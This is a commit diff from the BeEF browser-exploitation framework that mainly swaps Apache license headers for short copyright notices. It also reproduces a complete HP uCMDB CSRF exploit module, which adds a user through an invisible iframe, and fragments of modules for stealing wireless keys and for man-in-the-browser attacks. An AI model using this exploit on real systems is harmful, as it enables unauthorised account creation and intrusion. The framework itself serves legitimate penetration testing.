Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

More changed license headers

Browse Source
This commit is contained in:
Wade Alcorn
2012-11-02 15:27:01 +10:00
parent 23f09b919f
commit d2188b230c
27 changed files with 317 additions and 559 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
INSTALL.txt
View File

@@ -1,18 +1,8 @@
===============================================================================
Copyright 2012 Wade Alcorn wade@bindshell.net
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================

158
README
View File

@@ -1,84 +1,74 @@
===============================================================================
Copyright 2012 Wade Alcorn wade@bindshell.net
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================================================
What is BeEF?
-------------
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Get Involved
------------
You can get in touch with the BeEF team. Just check out the following:
Please, send us pull requests!
Web: http://beefproject.com/
Mail: beef-subscribe@bindshell.net
IRC: ircs://irc.freenode.net/beefproject
Twitter: @beefproject
Requirements
------------
* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
* [SQLite](http://sqlite.org) 3.x
* The following GEMS:
- bundler
- thin
- Sinatra
- ANSI
- TERM-ANSIcolor
- dm-core
- json
- data_objects
- dm-sqlite-adapter
- parseconfig
- erubis
- dm-migrations
- msfrpc-client
- eventmachine
- win32console (Windows Only)
Quick Start
-----------
__The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
Usage
-----
To get started, simply execute beef and follow the instrustions:
$ ./beef
===============================================================================
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================
What is BeEF?
-------------
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Get Involved
------------
You can get in touch with the BeEF team. Just check out the following:
Please, send us pull requests!
Web: http://beefproject.com/
Mail: beef-subscribe@bindshell.net
IRC: ircs://irc.freenode.net/beefproject
Twitter: @beefproject
Requirements
------------
* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
* [SQLite](http://sqlite.org) 3.x
* The following GEMS:
- bundler
- thin
- Sinatra
- ANSI
- TERM-ANSIcolor
- dm-core
- json
- data_objects
- dm-sqlite-adapter
- parseconfig
- erubis
- dm-migrations
- msfrpc-client
- eventmachine
- win32console (Windows Only)
Quick Start
-----------
__The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
Usage
-----
To get started, simply execute beef and follow the instrustions:
$ ./beef

158
README.mkd
View File

@@ -1,84 +1,74 @@
===============================================================================
Copyright 2012 Wade Alcorn wade@bindshell.net
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================================================
What is BeEF?
-------------
__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Get Involved
------------
You can get in touch with the BeEF team. Just check out the following:
__Please, send us pull requests!__
__Web:__ http://beefproject.com/
__Mail:__ beef-subscribe@bindshell.net
__IRC:__ ircs://irc.freenode.net/beefproject
__Twitter:__ @beefproject
Requirements
------------
* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
* [SQLite](http://sqlite.org) 3.x
* The following GEMS:
- bundler
- thin
- Sinatra
- ANSI
- TERM-ANSIcolor
- dm-core
- json
- data_objects
- dm-sqlite-adapter
- parseconfig
- erubis
- dm-migrations
- msfrpc-client
- eventmachine
- win32console (Windows Only)
Quick Start
-----------
__The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
Usage
-----
To get started, simply execute beef and follow the instructions:
$ ./beef
===============================================================================
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================
What is BeEF?
-------------
__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Get Involved
------------
You can get in touch with the BeEF team. Just check out the following:
__Please, send us pull requests!__
__Web:__ http://beefproject.com/
__Mail:__ beef-subscribe@bindshell.net
__IRC:__ ircs://irc.freenode.net/beefproject
__Twitter:__ @beefproject
Requirements
------------
* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
* [SQLite](http://sqlite.org) 3.x
* The following GEMS:
- bundler
- thin
- Sinatra
- ANSI
- TERM-ANSIcolor
- dm-core
- json
- data_objects
- dm-sqlite-adapter
- parseconfig
- erubis
- dm-migrations
- msfrpc-client
- eventmachine
- win32console (Windows Only)
Quick Start
-----------
__The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
Usage
-----
To get started, simply execute beef and follow the instructions:
$ ./beef

15
core/loader.rb
View File

@@ -1,17 +1,8 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# @note Include here all the gems we are using
require 'rubygems'

14
core/main/handlers/modules/command.rb
View File

@@ -51,19 +51,11 @@ module BeEF
#todo antisnatchor: remove this gsub crap adding some hook packing.
if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
#content = command_module.output.gsub('//
#// Copyright 2012 Wade Alcorn wade@bindshell.net
#//
#// Licensed under the Apache License, Version 2.0 (the "License");
#// you may not use this file except in compliance with the License.
#// You may obtain a copy of the License at
#// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
#// Browser Exploitation Framework (BeEF) - http://beefproject.com
#// See the file 'doc/COPYING' for copying permission
#//
#// http://www.apache.org/licenses/LICENSE-2.0
#//
#// Unless required by applicable law or agreed to in writing, software
#// distributed under the License is distributed on an "AS IS" BASIS,
#// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#// See the License for the specific language governing permissions and
#// limitations under the License.
#//', "")
ws.send(@output, hooked_browser.session)
else

17
extensions/admin_ui/media/css/base.css
View File

@@ -1,18 +1,9 @@
/*
* Copyright 2012 Wade Alcorn wade@bindshell.net
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
#header .right-menu {
float: right;
margin: 10px;

17
extensions/admin_ui/media/css/ext-all.css
View File

@@ -1,18 +1,9 @@
/*
* Copyright 2012 Wade Alcorn wade@bindshell.net
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
/*!
* Ext JS Library 3.3.1
* Copyright(c) 2006-2010 Sencha Inc.

17
extensions/admin_ui/media/css/wterm.css
View File

@@ -1,18 +1,9 @@
/*
* Copyright 2012 Wade Alcorn wade@bindshell.net
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
/* Basic Terminal CSS */
.wterm_terminal { background: #000; color: #fff; font-size: 1em; font-family: monospace; padding: 3px; width: 100%; height: 100%; display: block; overflow-x: none; overflow-y: auto; }

17
extensions/demos/html/butcher/butch.css
View File

@@ -1,18 +1,9 @@
/*
* Copyright 2012 Wade Alcorn wade@bindshell.net
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
html {
height: 100%;
}

15
extensions/notifications/notifications.rb
View File

@@ -1,17 +1,8 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'extensions/notifications/channels/tweet'
require 'extensions/notifications/channels/email'

17
extensions/requester/api/hook.rb
View File

@@ -3,6 +3,7 @@
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Requester
@@ -31,19 +32,9 @@ module BeEF
#todo antisnatchor: remove this gsub crap adding some hook packing.
if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session)
content = File.read(find_beefjs_component_path 'beef.net.requester').gsub('//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file \'doc/COPYING\' for copying permission
//', "")
add_to_body output
ws.send(content + @body,hb.session)

16
extensions/xssrays/api/scan.rb
View File

@@ -43,19 +43,9 @@ module BeEF
# todo antisnatchor: remove this gsub crap adding some hook packing.
if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session)
content = File.read(find_beefjs_component_path 'beef.net.xssrays').gsub('//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file \'doc/COPYING\' for copying permission
//', "")
add_to_body xs.id, hb.session, beefurl, cross_domain, timeout, debug
ws.send(content + @body,hb.session)

15
modules/browser/hooked_domain/ajax_fingerprint/module.rb
View File

@@ -1,17 +1,8 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class Ajax_fingerprint < BeEF::Core::Command

73
modules/exploits/hp_ucmdb_add_user_csrf/command.js
View File

@@ -1,41 +1,32 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var protocol = '<%= @protocol %>';
var host = '<%= @host %>';
var port = '<%= @port %>';
var usertype = '<%= @usertype %>';
var customerid = '<%= @customerid %>';
var username = '<%= @username %>';
var password = '<%= @password %>';
var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype;
url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password;
if (usertype == 'createIntegrationUser'){
url += '&arg3=';
}
var ucmdb_iframe = beef.dom.createInvisibleIframe();
ucmdb_iframe.setAttribute('src', url);
cleanup = function() {
document.body.removeChild(ucmdb_iframe);
}
setTimeout("cleanup()", 15000);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
});
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
beef.execute(function() {
var protocol = '<%= @protocol %>';
var host = '<%= @host %>';
var port = '<%= @port %>';
var usertype = '<%= @usertype %>';
var customerid = '<%= @customerid %>';
var username = '<%= @username %>';
var password = '<%= @password %>';
var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype;
url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password;
if (usertype == 'createIntegrationUser'){
url += '&arg3=';
}
var ucmdb_iframe = beef.dom.createInvisibleIframe();
ucmdb_iframe.setAttribute('src', url);
cleanup = function() {
document.body.removeChild(ucmdb_iframe);
}
setTimeout("cleanup()", 15000);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
});

40
modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
View File

@@ -1,25 +1,15 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
hp_ucmdb_add_user_csrf:
enable: true
category: "Exploits"
name: "HP uCMDB 9.0x add user CSRF"
description: "This module attempts to add additional users to the HP uCMDB (universal configuration management database).<br />For more information please refer to <a href='http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html'>http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html</a>"
authors: ["Bart Leppens"]
target:
working: ["ALL"]
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
hp_ucmdb_add_user_csrf:
enable: true
category: "Exploits"
name: "HP uCMDB 9.0x add user CSRF"
description: "This module attempts to add additional users to the HP uCMDB (universal configuration management database).<br />For more information please refer to <a href='http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html'>http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html</a>"
authors: ["Bart Leppens"]
target:
working: ["ALL"]

71
modules/exploits/hp_ucmdb_add_user_csrf/module.rb
View File

@@ -1,40 +1,31 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Hp_ucmdb_add_user_csrf < BeEF::Core::Command
def self.options
return [
{ 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore',
'store_fields' => ['protocol'], 'store_data' => [['http'],['https']],
'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true
},
{'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
{'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'},
{ 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore',
'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']],
'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true
},
{'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'},
{'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Hp_ucmdb_add_user_csrf < BeEF::Core::Command
def self.options
return [
{ 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore',
'store_fields' => ['protocol'], 'store_data' => [['http'],['https']],
'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true
},
{'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
{'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'},
{ 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore',
'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']],
'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true
},
{'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'},
{'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

21
modules/host/get_physical_location/command.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
beef.execute(function() {
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
var applet_id = '<%= @applet_id %>';

17
modules/host/get_physical_location/config.yaml
View File

@@ -1,18 +1,9 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
get_physical_location:

17
modules/host/get_physical_location/module.rb
View File

@@ -1,18 +1,9 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
require 'rubygems'
require 'json'
require 'open-uri'

21
modules/host/get_wireless_keys/command.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
beef.execute(function() {
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar';
var applet_id = '<%= @applet_id %>';

17
modules/host/get_wireless_keys/config.yaml
View File

@@ -1,18 +1,9 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
get_wireless_keys:

19
modules/persistence/man_in_the_browser/command.js
View File

@@ -1,17 +1,8 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
beef.execute(function() {
try{

20
modules/phonegap/phonegap_check_connection/command.js
View File

@@ -1,17 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
beef.execute(function() {
var connection_type;

19
modules/phonegap/phonegap_persist_resume/command.js
View File

@@ -1,17 +1,8 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
//
// persist on over app's sleep/wake events

19
modules/social_engineering/clickjacking/command.js
View File

@@ -1,16 +1,9 @@
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
beef.execute(function() {
var elems = {
outerFrame: "cjFrame",

14
modules/social_engineering/clickjacking/config.yaml
View File

@@ -1,15 +1,7 @@
#
# Licensed under the Apache License, Version 2.0 (the "License");
